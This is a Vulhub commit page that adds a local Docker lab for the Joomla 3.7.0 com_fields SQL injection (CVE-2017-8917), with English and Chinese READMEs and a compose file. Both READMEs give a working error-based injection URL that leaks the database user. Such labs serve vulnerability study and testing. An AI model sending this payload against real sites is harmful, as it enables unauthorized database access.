first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
BIN
joomla/CVE-2017-8917/1.png
Normal file
BIN
joomla/CVE-2017-8917/1.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 82 KiB |
32
joomla/CVE-2017-8917/README.md
Normal file
32
joomla/CVE-2017-8917/README.md
Normal file
@@ -0,0 +1,32 @@
|
||||
# Joomla 3.7.0 com_fields SQL Injection Vulnerability (CVE-2017-8917)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Joomla is a free and open-source content management system (CMS) that allows users to build websites and online applications. It was first released in 2005 and has since become one of the most popular CMS platforms, powering millions of websites around the world.
|
||||
|
||||
An SQL injection vulnerability is caused by a new component, com_fields, which was introduced in version 3.7.
|
||||
|
||||
References:
|
||||
|
||||
- <https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html>
|
||||
- <https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html>
|
||||
|
||||
## Vulnerable environment
|
||||
|
||||
Executing following command to start a Joomla 3.4.5:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
After the server is started, you can see the home page of it at `http://your-ip:8080`.
|
||||
|
||||
## Exploit
|
||||
|
||||
Visit following link directly to reproduce the SQL injection attack:
|
||||
|
||||
```
|
||||
http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
|
||||
```
|
||||
|
||||
|
||||
26
joomla/CVE-2017-8917/README.zh-cn.md
Normal file
26
joomla/CVE-2017-8917/README.zh-cn.md
Normal file
@@ -0,0 +1,26 @@
|
||||
# Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
|
||||
|
||||
Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。
|
||||
|
||||
Joomla在3.7.0中新引入的一个组件“com_fields”,这个组件任何人都可以访问,无需登陆验证。com_fields组件由于对请求数据过滤不严导致了SQL注入。
|
||||
|
||||
参考链接:
|
||||
|
||||
- <https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html>
|
||||
- <https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html>
|
||||
|
||||
## 测试环境
|
||||
|
||||
执行如下命令启动一个Joomla 3.7.0服务:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
启动后访问`http://your-ip:8080`即可看到Joomla的安装界面和测试数据。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
直接访问`http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)`,即可看到SQL报错信息:
|
||||
|
||||
|
||||
18
joomla/CVE-2017-8917/docker-compose.yml
Normal file
18
joomla/CVE-2017-8917/docker-compose.yml
Normal file
@@ -0,0 +1,18 @@
|
||||
version: '2'
|
||||
services:
|
||||
web:
|
||||
image: vulhub/joomla:3.7.0
|
||||
depends_on:
|
||||
- mysql
|
||||
environment:
|
||||
- JOOMLA_DB_HOST=mysql
|
||||
- JOOMLA_DB_PORT=3306
|
||||
- JOOMLA_DB_USER=root
|
||||
- JOOMLA_DB_PASSWORD=vulhub
|
||||
- JOOMLA_DB_NAME=joomla
|
||||
ports:
|
||||
- "8080:80"
|
||||
mysql:
|
||||
image: mysql:5.7
|
||||
environment:
|
||||
- MYSQL_ROOT_PASSWORD=vulhub
|
||||
Reference in New Issue
Block a user